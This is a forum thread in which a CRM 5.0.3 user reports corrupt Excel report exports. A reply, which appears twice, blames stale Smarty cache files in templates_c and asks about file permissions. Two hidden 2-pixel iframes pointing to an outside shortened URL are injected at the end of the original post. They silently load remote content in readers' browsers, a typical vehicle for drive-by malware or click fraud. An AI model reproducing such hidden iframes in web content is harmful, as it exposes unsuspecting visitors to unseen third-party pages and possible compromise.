I/O Error when a excel report is generated

Hi,
I'm using crm 5.0.3(patched) and when I create a report I can export it to a pdf without problems, but when I export to excel I have a file with I/O Error (input output erros), so I can open the file.

Any help will be appreciated.

Regards,

PS: I asume the file contains some info inside, because the size is 60Kb. <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>; <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>;

Comments

• 3 Comments sorted by Votes Date Added
  • hi,
    i've done as follow:

1. copied the modules/reports from a fresh installation to my current instalation.
    2. i've cleaned the smarty/templates_c
    3. then i could generate a excel report. just aftert that, i couldn't generate another excel report.

the problem:

some cache files on smarty/templates_c related to the reports module prevent to generate new excel reports.

so the problem in my case is that these files on templates_c

%%0a^0a5^0a57cc2a%%reportscustomize.tpl.php 644
    %%3a^3ae^3aebc6e6%%reportcontents.tpl.php 644
    %%83^83f^83f528e7%%reportruncontents.tpl.php 644
    %%4f^4f5^4f5b4753%%reportrun.tpl.php 644
    %%a8^a8e^a8eb3331%%reports.tpl.php 644

must be deleted before any new excel report.

is possible that smarty can not be able to remove these temp files because the 644 permissions? how can i change that.

regards,
  • hi,
    i've done as follow:

1. copied the modules/reports from a fresh installation to my current instalation.
    2. i've cleaned the smarty/templates_c
    3. then i could generate a excel report. just aftert that, i couldn't generate another excel report.

the problem:

some cache files on smarty/templates_c related to the reports module prevent to generate new excel reports.

so the problem in my case is that these files on templates_c

%%0a^0a5^0a57cc2a%%reportscustomize.tpl.php 644
    %%3a^3ae^3aebc6e6%%reportcontents.tpl.php 644
    %%83^83f^83f528e7%%reportruncontents.tpl.php 644
    %%4f^4f5^4f5b4753%%reportrun.tpl.php 644
    %%a8^a8e^a8eb3331%%reports.tpl.php 644

must be deleted before any new excel report.

is possible that smarty can not be able to remove these temp files because the 644 permissions? how can i change that.

regards,